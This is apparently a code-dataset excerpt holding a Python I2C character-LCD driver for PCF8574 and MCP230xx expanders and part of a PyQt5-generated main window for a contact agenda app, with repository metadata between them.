IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import print_function, division, absolute_import, unicode_literals
from smbus import SMBus
from . import common as c
from .lcd import BaseCharLCD
# PCF8574 backlight control
PCF8574_BACKLIGHT = 0x08
PCF8574_NOBACKLIGHT = 0x00
# PCF8574 Pin bitmasks
PCF8574_E = 0x4
PIN_READ_WRITE = 0x2 # Not used?
PIN_REGISTER_SELECT = 0x1 # Not used?
# MCP230XX backlight control
MCP230XX_BACKLIGHT = 0x80
MCP230XX_NOBACKLIGHT = 0x7f
# MCP230XX pin bitmasks and datamask
MCP230XX_RS = 0x02
MCP230XX_E = 0x4
MCP230XX_DATAMASK = 0x78
MCP230XX_DATASHIFT = 3
# MCP23008 Register addresses
MCP23008_IODIR = 0x00
MCP23008_GPIO = 0x09
# MCP23017 Register addresses
MCP23017_IODIRA = 0x00
MCP23017_IODIRB = 0x01
MCP23017_GPIOA = 0x12
MCP23017_GPIOB = 0x13
class CharLCD(BaseCharLCD):
def __init__(self, i2c_expander, address, expander_params=None, port=1,
cols=20, rows=4, dotsize=8,
charmap='A02',
auto_linebreaks=True,
backlight_enabled=True):
"""
CharLCD via PCF8574 I2C port expander:
Pin mapping::
7 | 6 | 5 | 4 | 3 | 2 | 1 | 0
D7 | D6 | D5 | D4 | BL | EN | RW | RS
CharLCD via MCP23008 and MCP23017 I2C port expanders:
Adafruit I2C/SPI LCD Backback is supported.
Warning: You might need a level shifter (that supports i2c)
between the SCL/SDA connections on the MCP chip / backpack and the Raspberry Pi.
Or you might damage the Pi and possibly any other 3.3V i2c devices
connected on the i2c bus. Or cause reliability issues. The SCL/SDA are rated 0.7*VDD
on the MCP23008, so it needs 3.5V on the SCL/SDA when 5V is applied to drive the LCD.
The MCP23008 and MCP23017 needs to be connected exactly the same way as the backpack.
For complete schematics see the adafruit page at:
https://learn.adafruit.com/i2c-spi-lcd-backpack/
4-bit operation. I2C only supported.
Pin mapping::
7 | 6 | 5 | 4 | 3 | 2 | 1 | 0
BL | D7 | D6 | D5 | D4 | E | RS | -
:param address: The I2C address of your LCD.
:type address: int
:param i2c_expander: Set your I²C chip type. Supported: "PCF8574", "MCP23008", "MCP23017".
:type i2c_expander: string
:param expander_params: Parameters for expanders, in a dictionary. Only needed for MCP23017
gpio_bank - This must be either ``A`` or ``B``
If you have a HAT, A is usually marked 1 and B is 2
Example: expander_params={'gpio_bank': 'A'}
:type expander_params: dictionary
:param port: The I2C port number. Default: ``1``.
:type port: int
:param cols: Number of columns per row (usually 16 or 20). Default: ``20``.
:type cols: int
:param rows: Number of display rows (usually 1, 2 or 4). Default: ``4``.
:type rows: int
:param dotsize: Some 1 line displays allow a font height of 10px.
Allowed: 8 or 10. Default: ``8``.
:type dotsize: int
:param charmap: The character map used. Depends on your LCD. This must
be either ``A00`` or ``A02``. Default: ``A02``.
:type charmap: str
:param auto_linebreaks: Whether or not to automatically insert line breaks.
Default: ``True``.
:type auto_linebreaks: bool
:param backlight_enabled: Whether the backlight is enabled initially. Default: ``True``.
:type backlight_enabled: bool
"""
# Set own address and port.
self._address = address
self._port = port
# Set i2c expander, 'PCF8574', 'MCP23008' and 'MCP23017' are supported.
if i2c_expander in ['PCF8574', 'MCP23008', 'MCP23017']:
self._i2c_expander = i2c_expander
else:
raise NotImplementedError('I2C expander "%s" is not supported.' % i2c_expander)
# Errorchecking for expander parameters
if expander_params is None:
if self._i2c_expander == 'MCP23017':
raise ValueError('MCP23017: expander_params[\'gpio_bank\'] is not defined, '
'must be either \'A\' or \'B\'')
else:
self._expander_params = {}
else:
if self._i2c_expander == 'MCP23017':
if expander_params['gpio_bank'] in ['A', 'B']:
self._expander_params = {}
self._expander_params['gpio_bank'] = expander_params['gpio_bank']
else:
raise ValueError('MCP23017: expander_params[\'gpio_bank\'] is \'%s\', '
'must be either \'A\' or \'B\'' % expander_params['gpio_bank'])
# Currently the I2C mode only supports 4 bit communication
self.data_bus_mode = c.LCD_4BITMODE
# Set backlight status
if self._i2c_expander == 'PCF8574':
self._backlight = PCF8574_BACKLIGHT if backlight_enabled else PCF8574_NOBACKLIGHT
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._backlight = MCP230XX_BACKLIGHT if backlight_enabled else MCP230XX_NOBACKLIGHT
# Call superclass
super(CharLCD, self).__init__(cols, rows, dotsize,
charmap=charmap,
auto_linebreaks=auto_linebreaks)
# Refresh backlight status
self.backlight_enabled = backlight_enabled
def _init_connection(self):
self.bus = SMBus(self._port)
if self._i2c_expander == 'PCF8574':
c.msleep(50)
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
# Variable for storing data and applying bitmasks and shifting.
self._mcp_data = 0
# Set iodir register value according to expander
# If using MCP23017 set which gpio bank to use, A or B
if self._i2c_expander == 'MCP23008':
IODIR = MCP23008_IODIR
self._mcp_gpio = MCP23008_GPIO
elif self._i2c_expander == 'MCP23017':
# Set gpio bank A or B
if self._expander_params['gpio_bank'] == 'A':
IODIR = MCP23017_IODIRA
self._mcp_gpio = MCP23017_GPIOA
elif self._expander_params['gpio_bank'] == 'B':
IODIR = MCP23017_IODIRB
self._mcp_gpio = MCP23017_GPIOB
# Set IO DIRection to output on all GPIOs (GP0-GP7)
self.bus.write_byte_data(self._address, IODIR, 0x00)
def _close_connection(self):
# Nothing to do here?
pass
# Properties
def _get_backlight_enabled(self):
if self._i2c_expander == 'PCF8574':
return self._backlight == PCF8574_BACKLIGHT
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
return self._backlight == MCP230XX_BACKLIGHT
def _set_backlight_enabled(self, value):
if self._i2c_expander == 'PCF8574':
self._backlight = PCF8574_BACKLIGHT if value else PCF8574_NOBACKLIGHT
self.bus.write_byte(self._address, self._backlight)
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
if value is True:
self._mcp_data |= MCP230XX_BACKLIGHT
else:
self._mcp_data &= MCP230XX_NOBACKLIGHT
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
backlight_enabled = property(_get_backlight_enabled, _set_backlight_enabled,
doc='Whether or not to enable the backlight. Either ``True`` or ``False``.')
# Low level commands
def _send_data(self, value):
if self._i2c_expander == 'PCF8574':
self.bus.write_byte(self._address, (c.RS_DATA | (value & 0xF0)) | self._backlight)
self._pulse_data(c.RS_DATA | (value & 0xF0))
self.bus.write_byte(self._address, (c.RS_DATA |
((value << 4) & 0xF0)) | self._backlight)
self._pulse_data(c.RS_DATA | ((value << 4) & 0xF0))
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data |= MCP230XX_RS
self._pulse_data(value >> 4)
self._pulse_data(value & 0x0F)
def _send_instruction(self, value):
if self._i2c_expander == 'PCF8574':
self.bus.write_byte(self._address, (c.RS_INSTRUCTION |
(value & 0xF0)) | self._backlight)
self._pulse_data(c.RS_INSTRUCTION | (value & 0xF0))
self.bus.write_byte(self._address, (c.RS_INSTRUCTION |
((value << 4) & 0xF0)) | self._backlight)
self._pulse_data(c.RS_INSTRUCTION | ((value << 4) & 0xF0))
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data &= ~MCP230XX_RS
self._pulse_data(value >> 4)
self._pulse_data(value & 0x0F)
def _pulse_data(self, value):
"""Pulse the `enable` flag to process value."""
if self._i2c_expander == 'PCF8574':
self.bus.write_byte(self._address, ((value & ~PCF8574_E) | self._backlight))
c.usleep(1)
self.bus.write_byte(self._address, value | PCF8574_E | self._backlight)
c.usleep(1)
self.bus.write_byte(self._address, ((value & ~PCF8574_E) | self._backlight))
c.usleep(100)
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data &= ~MCP230XX_DATAMASK
self._mcp_data |= value << MCP230XX_DATASHIFT
self._mcp_data &= ~MCP230XX_E
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
c.usleep(1)
self._mcp_data |= MCP230XX_E
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
c.usleep(1)
self._mcp_data &= ~MCP230XX_E
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
c.usleep(100)
| 42.235075
| 99
| 0.616044
|
from __future__ import print_function, division, absolute_import, unicode_literals
from smbus import SMBus
from . import common as c
from .lcd import BaseCharLCD
PCF8574_BACKLIGHT = 0x08
PCF8574_NOBACKLIGHT = 0x00
PCF8574_E = 0x4
PIN_READ_WRITE = 0x2
PIN_REGISTER_SELECT = 0x1
MCP230XX_BACKLIGHT = 0x80
MCP230XX_NOBACKLIGHT = 0x7f
MCP230XX_RS = 0x02
MCP230XX_E = 0x4
MCP230XX_DATAMASK = 0x78
MCP230XX_DATASHIFT = 3
MCP23008_IODIR = 0x00
MCP23008_GPIO = 0x09
MCP23017_IODIRA = 0x00
MCP23017_IODIRB = 0x01
MCP23017_GPIOA = 0x12
MCP23017_GPIOB = 0x13
class CharLCD(BaseCharLCD):
def __init__(self, i2c_expander, address, expander_params=None, port=1,
cols=20, rows=4, dotsize=8,
charmap='A02',
auto_linebreaks=True,
backlight_enabled=True):
self._address = address
self._port = port
if i2c_expander in ['PCF8574', 'MCP23008', 'MCP23017']:
self._i2c_expander = i2c_expander
else:
raise NotImplementedError('I2C expander "%s" is not supported.' % i2c_expander)
if expander_params is None:
if self._i2c_expander == 'MCP23017':
raise ValueError('MCP23017: expander_params[\'gpio_bank\'] is not defined, '
'must be either \'A\' or \'B\'')
else:
self._expander_params = {}
else:
if self._i2c_expander == 'MCP23017':
if expander_params['gpio_bank'] in ['A', 'B']:
self._expander_params = {}
self._expander_params['gpio_bank'] = expander_params['gpio_bank']
else:
raise ValueError('MCP23017: expander_params[\'gpio_bank\'] is \'%s\', '
'must be either \'A\' or \'B\'' % expander_params['gpio_bank'])
self.data_bus_mode = c.LCD_4BITMODE
if self._i2c_expander == 'PCF8574':
self._backlight = PCF8574_BACKLIGHT if backlight_enabled else PCF8574_NOBACKLIGHT
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._backlight = MCP230XX_BACKLIGHT if backlight_enabled else MCP230XX_NOBACKLIGHT
super(CharLCD, self).__init__(cols, rows, dotsize,
charmap=charmap,
auto_linebreaks=auto_linebreaks)
self.backlight_enabled = backlight_enabled
def _init_connection(self):
self.bus = SMBus(self._port)
if self._i2c_expander == 'PCF8574':
c.msleep(50)
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data = 0
if self._i2c_expander == 'MCP23008':
IODIR = MCP23008_IODIR
self._mcp_gpio = MCP23008_GPIO
elif self._i2c_expander == 'MCP23017':
if self._expander_params['gpio_bank'] == 'A':
IODIR = MCP23017_IODIRA
self._mcp_gpio = MCP23017_GPIOA
elif self._expander_params['gpio_bank'] == 'B':
IODIR = MCP23017_IODIRB
self._mcp_gpio = MCP23017_GPIOB
self.bus.write_byte_data(self._address, IODIR, 0x00)
def _close_connection(self):
pass
def _get_backlight_enabled(self):
if self._i2c_expander == 'PCF8574':
return self._backlight == PCF8574_BACKLIGHT
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
return self._backlight == MCP230XX_BACKLIGHT
def _set_backlight_enabled(self, value):
if self._i2c_expander == 'PCF8574':
self._backlight = PCF8574_BACKLIGHT if value else PCF8574_NOBACKLIGHT
self.bus.write_byte(self._address, self._backlight)
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
if value is True:
self._mcp_data |= MCP230XX_BACKLIGHT
else:
self._mcp_data &= MCP230XX_NOBACKLIGHT
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
backlight_enabled = property(_get_backlight_enabled, _set_backlight_enabled,
doc='Whether or not to enable the backlight. Either ``True`` or ``False``.')
def _send_data(self, value):
if self._i2c_expander == 'PCF8574':
self.bus.write_byte(self._address, (c.RS_DATA | (value & 0xF0)) | self._backlight)
self._pulse_data(c.RS_DATA | (value & 0xF0))
self.bus.write_byte(self._address, (c.RS_DATA |
((value << 4) & 0xF0)) | self._backlight)
self._pulse_data(c.RS_DATA | ((value << 4) & 0xF0))
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data |= MCP230XX_RS
self._pulse_data(value >> 4)
self._pulse_data(value & 0x0F)
def _send_instruction(self, value):
if self._i2c_expander == 'PCF8574':
self.bus.write_byte(self._address, (c.RS_INSTRUCTION |
(value & 0xF0)) | self._backlight)
self._pulse_data(c.RS_INSTRUCTION | (value & 0xF0))
self.bus.write_byte(self._address, (c.RS_INSTRUCTION |
((value << 4) & 0xF0)) | self._backlight)
self._pulse_data(c.RS_INSTRUCTION | ((value << 4) & 0xF0))
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data &= ~MCP230XX_RS
self._pulse_data(value >> 4)
self._pulse_data(value & 0x0F)
def _pulse_data(self, value):
if self._i2c_expander == 'PCF8574':
self.bus.write_byte(self._address, ((value & ~PCF8574_E) | self._backlight))
c.usleep(1)
self.bus.write_byte(self._address, value | PCF8574_E | self._backlight)
c.usleep(1)
self.bus.write_byte(self._address, ((value & ~PCF8574_E) | self._backlight))
c.usleep(100)
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data &= ~MCP230XX_DATAMASK
self._mcp_data |= value << MCP230XX_DATASHIFT
self._mcp_data &= ~MCP230XX_E
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
c.usleep(1)
self._mcp_data |= MCP230XX_E
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
c.usleep(1)
self._mcp_data &= ~MCP230XX_E
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
c.usleep(100)
| true
| true
|
1c447cd652110e5c98f244fcb259d5250072d56d
| 10,423
|
py
|
Python
|
Agenda Pessoal/src/views/views_classes/view_principal/classeTelaPrincipal.py
|
jao-victor/Agenda-Pessoal
|
39c9d1a61ff36c93daf49b799d45c665330b7155
|
[
"MIT"
] | 1
|
2022-01-29T16:27:50.000Z
|
2022-01-29T16:27:50.000Z
|
Agenda Pessoal/src/views/views_classes/view_principal/classeTelaPrincipal.py
|
jao-victor/Agenda-Pessoal
|
39c9d1a61ff36c93daf49b799d45c665330b7155
|
[
"MIT"
] | null | null | null |
Agenda Pessoal/src/views/views_classes/view_principal/classeTelaPrincipal.py
|
jao-victor/Agenda-Pessoal
|
39c9d1a61ff36c93daf49b799d45c665330b7155
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'telaPrincipal.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(950, 650)
MainWindow.setMinimumSize(QtCore.QSize(950, 650))
MainWindow.setMaximumSize(QtCore.QSize(16777215, 16777215))
MainWindow.setStyleSheet("")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setMinimumSize(QtCore.QSize(0, 0))
self.centralwidget.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.centralwidget.setStyleSheet("background-color: rgb(255, 255, 255);")
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName("verticalLayout")
self.navbar = QtWidgets.QFrame(self.centralwidget)
self.navbar.setMinimumSize(QtCore.QSize(0, 51))
self.navbar.setMaximumSize(QtCore.QSize(16777215, 51))
self.navbar.setStyleSheet("#navbar{\n"
" background-color: rgb(63, 125, 174);\n"
"}\n"
"")
self.navbar.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.navbar.setFrameShadow(QtWidgets.QFrame.Raised)
self.navbar.setObjectName("navbar")
self.logo_usuario = QtWidgets.QFrame(self.navbar)
self.logo_usuario.setGeometry(QtCore.QRect(3, 3, 61, 41))
self.logo_usuario.setStyleSheet("#logo_usuario{\n"
" background-color: rgb(63, 125, 174);\n"
" background-image: url(:/imagens/icone_user.png);\n"
" background-repeat: no-repeat;\n"
"}")
self.logo_usuario.setFrameShape(QtWidgets.QFrame.NoFrame)
self.logo_usuario.setFrameShadow(QtWidgets.QFrame.Raised)
self.logo_usuario.setObjectName("logo_usuario")
self.label_2 = QtWidgets.QLabel(self.navbar)
self.label_2.setGeometry(QtCore.QRect(75, 10, 91, 31))
font = QtGui.QFont()
font.setPointSize(12)
self.label_2.setFont(font)
self.label_2.setStyleSheet("background-color: rgb(63, 125, 174);\n"
"color:white;")
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.navbar)
self.barra_de_busca = QtWidgets.QFrame(self.centralwidget)
self.barra_de_busca.setMinimumSize(QtCore.QSize(0, 51))
self.barra_de_busca.setMaximumSize(QtCore.QSize(16777215, 51))
self.barra_de_busca.setFrameShape(QtWidgets.QFrame.NoFrame)
self.barra_de_busca.setFrameShadow(QtWidgets.QFrame.Raised)
self.barra_de_busca.setObjectName("barra_de_busca")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.barra_de_busca)
self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_2.setSpacing(0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.frame = QtWidgets.QFrame(self.barra_de_busca)
self.frame.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.pesquisar_contato = QtWidgets.QLineEdit(self.frame)
self.pesquisar_contato.setGeometry(QtCore.QRect(10, 20, 191, 21))
self.pesquisar_contato.setMaximumSize(QtCore.QSize(191, 21))
self.pesquisar_contato.setStyleSheet("color: black;")
self.pesquisar_contato.setObjectName("pesquisar_contato")
self.b_procurar = QtWidgets.QPushButton(self.frame)
self.b_procurar.setGeometry(QtCore.QRect(210, 17, 80, 25))
self.b_procurar.setMaximumSize(QtCore.QSize(80, 25))
self.b_procurar.setStyleSheet("#b_procurar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_procurar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_procurar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_procurar.setObjectName("b_procurar")
self.horizontalLayout_2.addWidget(self.frame)
self.frame_2 = QtWidgets.QFrame(self.barra_de_busca)
self.frame_2.setMinimumSize(QtCore.QSize(100, 51))
self.frame_2.setMaximumSize(QtCore.QSize(100, 16777215))
self.frame_2.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.b_sair = QtWidgets.QPushButton(self.frame_2)
self.b_sair.setGeometry(QtCore.QRect(30, 10, 60, 35))
self.b_sair.setMinimumSize(QtCore.QSize(60, 35))
self.b_sair.setMaximumSize(QtCore.QSize(60, 35))
self.b_sair.setStyleSheet("#b_sair{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_sair:hover{\n"
" color:black;\n"
" background-color: rgb(255, 14, 14);\n"
"}\n"
"\n"
"")
self.b_sair.setObjectName("b_sair")
self.horizontalLayout_2.addWidget(self.frame_2)
self.verticalLayout.addWidget(self.barra_de_busca)
self.scrollArea = QtWidgets.QScrollArea(self.centralwidget)
self.scrollArea.setMinimumSize(QtCore.QSize(0, 100))
self.scrollArea.setStyleSheet("")
self.scrollArea.setFrameShape(QtWidgets.QFrame.NoFrame)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents_2 = QtWidgets.QWidget()
self.scrollAreaWidgetContents_2.setGeometry(QtCore.QRect(0, 0, 950, 506))
self.scrollAreaWidgetContents_2.setObjectName("scrollAreaWidgetContents_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.scrollAreaWidgetContents_2)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 1)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.tabela_de_contatos = QtWidgets.QTableView(self.scrollAreaWidgetContents_2)
self.tabela_de_contatos.setStyleSheet("#tabela_de_contatos{\n"
" color: black;\n"
" \n"
" background-color: rgb(255, 255, 224);\n"
"}")
self.tabela_de_contatos.setFrameShape(QtWidgets.QFrame.NoFrame)
self.tabela_de_contatos.setObjectName("tabela_de_contatos")
self.verticalLayout_2.addWidget(self.tabela_de_contatos)
self.scrollArea.setWidget(self.scrollAreaWidgetContents_2)
self.verticalLayout.addWidget(self.scrollArea)
self.barra_de_botoes = QtWidgets.QFrame(self.centralwidget)
self.barra_de_botoes.setMaximumSize(QtCore.QSize(16777215, 60))
self.barra_de_botoes.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.barra_de_botoes.setFrameShadow(QtWidgets.QFrame.Raised)
self.barra_de_botoes.setObjectName("barra_de_botoes")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.barra_de_botoes)
self.horizontalLayout.setContentsMargins(4, 0, 4, 0)
self.horizontalLayout.setSpacing(10)
self.horizontalLayout.setObjectName("horizontalLayout")
self.b_adicionar = QtWidgets.QPushButton(self.barra_de_botoes)
self.b_adicionar.setMinimumSize(QtCore.QSize(0, 33))
self.b_adicionar.setStyleSheet("#b_adicionar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_adicionar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_adicionar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_adicionar.setObjectName("b_adicionar")
self.horizontalLayout.addWidget(self.b_adicionar)
self.b_atualizar = QtWidgets.QPushButton(self.barra_de_botoes)
self.b_atualizar.setMinimumSize(QtCore.QSize(0, 33))
self.b_atualizar.setStyleSheet("#b_atualizar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_atualizar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_atualizar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_atualizar.setObjectName("b_atualizar")
self.horizontalLayout.addWidget(self.b_atualizar)
self.b_deletar = QtWidgets.QPushButton(self.barra_de_botoes)
self.b_deletar.setMinimumSize(QtCore.QSize(0, 33))
self.b_deletar.setStyleSheet("#b_deletar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_deletar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_deletar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_deletar.setObjectName("b_deletar")
self.horizontalLayout.addWidget(self.b_deletar)
self.refresh = QtWidgets.QPushButton(self.barra_de_botoes)
self.refresh.setMinimumSize(QtCore.QSize(0, 40))
self.refresh.setMaximumSize(QtCore.QSize(70, 16777215))
self.refresh.setStyleSheet("#refresh{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" background-image: url(:/imagens/rotacaoE.png);\n"
" background-position:center;\n"
" border-style: solid;\n"
"}\n"
"\n"
"#refresh:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#refresh:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.refresh.setText("")
self.refresh.setObjectName("refresh")
self.horizontalLayout.addWidget(self.refresh)
self.verticalLayout.addWidget(self.barra_de_botoes)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_2.setText(_translate("MainWindow", "UserName"))
self.b_procurar.setText(_translate("MainWindow", "Buscar"))
self.b_sair.setText(_translate("MainWindow", "Sair"))
self.b_adicionar.setText(_translate("MainWindow", "ADICIONAR"))
self.b_atualizar.setText(_translate("MainWindow", "ATUALIZAR"))
self.b_deletar.setText(_translate("MainWindow", "DELETAR"))
| 43.610879
| 87
| 0.694905
|
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(950, 650)
MainWindow.setMinimumSize(QtCore.QSize(950, 650))
MainWindow.setMaximumSize(QtCore.QSize(16777215, 16777215))
MainWindow.setStyleSheet("")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setMinimumSize(QtCore.QSize(0, 0))
self.centralwidget.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.centralwidget.setStyleSheet("background-color: rgb(255, 255, 255);")
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName("verticalLayout")
self.navbar = QtWidgets.QFrame(self.centralwidget)
self.navbar.setMinimumSize(QtCore.QSize(0, 51))
self.navbar.setMaximumSize(QtCore.QSize(16777215, 51))
self.navbar.setStyleSheet("#navbar{\n"
" background-color: rgb(63, 125, 174);\n"
"}\n"
"")
self.navbar.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.navbar.setFrameShadow(QtWidgets.QFrame.Raised)
self.navbar.setObjectName("navbar")
self.logo_usuario = QtWidgets.QFrame(self.navbar)
self.logo_usuario.setGeometry(QtCore.QRect(3, 3, 61, 41))
self.logo_usuario.setStyleSheet("#logo_usuario{\n"
" background-color: rgb(63, 125, 174);\n"
" background-image: url(:/imagens/icone_user.png);\n"
" background-repeat: no-repeat;\n"
"}")
self.logo_usuario.setFrameShape(QtWidgets.QFrame.NoFrame)
self.logo_usuario.setFrameShadow(QtWidgets.QFrame.Raised)
self.logo_usuario.setObjectName("logo_usuario")
self.label_2 = QtWidgets.QLabel(self.navbar)
self.label_2.setGeometry(QtCore.QRect(75, 10, 91, 31))
font = QtGui.QFont()
font.setPointSize(12)
self.label_2.setFont(font)
self.label_2.setStyleSheet("background-color: rgb(63, 125, 174);\n"
"color:white;")
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.navbar)
self.barra_de_busca = QtWidgets.QFrame(self.centralwidget)
self.barra_de_busca.setMinimumSize(QtCore.QSize(0, 51))
self.barra_de_busca.setMaximumSize(QtCore.QSize(16777215, 51))
self.barra_de_busca.setFrameShape(QtWidgets.QFrame.NoFrame)
self.barra_de_busca.setFrameShadow(QtWidgets.QFrame.Raised)
self.barra_de_busca.setObjectName("barra_de_busca")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.barra_de_busca)
self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_2.setSpacing(0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.frame = QtWidgets.QFrame(self.barra_de_busca)
self.frame.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.pesquisar_contato = QtWidgets.QLineEdit(self.frame)
self.pesquisar_contato.setGeometry(QtCore.QRect(10, 20, 191, 21))
self.pesquisar_contato.setMaximumSize(QtCore.QSize(191, 21))
self.pesquisar_contato.setStyleSheet("color: black;")
self.pesquisar_contato.setObjectName("pesquisar_contato")
self.b_procurar = QtWidgets.QPushButton(self.frame)
self.b_procurar.setGeometry(QtCore.QRect(210, 17, 80, 25))
self.b_procurar.setMaximumSize(QtCore.QSize(80, 25))
self.b_procurar.setStyleSheet("#b_procurar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_procurar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_procurar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_procurar.setObjectName("b_procurar")
self.horizontalLayout_2.addWidget(self.frame)
self.frame_2 = QtWidgets.QFrame(self.barra_de_busca)
self.frame_2.setMinimumSize(QtCore.QSize(100, 51))
self.frame_2.setMaximumSize(QtCore.QSize(100, 16777215))
self.frame_2.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.b_sair = QtWidgets.QPushButton(self.frame_2)
self.b_sair.setGeometry(QtCore.QRect(30, 10, 60, 35))
self.b_sair.setMinimumSize(QtCore.QSize(60, 35))
self.b_sair.setMaximumSize(QtCore.QSize(60, 35))
self.b_sair.setStyleSheet("#b_sair{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_sair:hover{\n"
" color:black;\n"
" background-color: rgb(255, 14, 14);\n"
"}\n"
"\n"
"")
self.b_sair.setObjectName("b_sair")
self.horizontalLayout_2.addWidget(self.frame_2)
self.verticalLayout.addWidget(self.barra_de_busca)
self.scrollArea = QtWidgets.QScrollArea(self.centralwidget)
self.scrollArea.setMinimumSize(QtCore.QSize(0, 100))
self.scrollArea.setStyleSheet("")
self.scrollArea.setFrameShape(QtWidgets.QFrame.NoFrame)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents_2 = QtWidgets.QWidget()
self.scrollAreaWidgetContents_2.setGeometry(QtCore.QRect(0, 0, 950, 506))
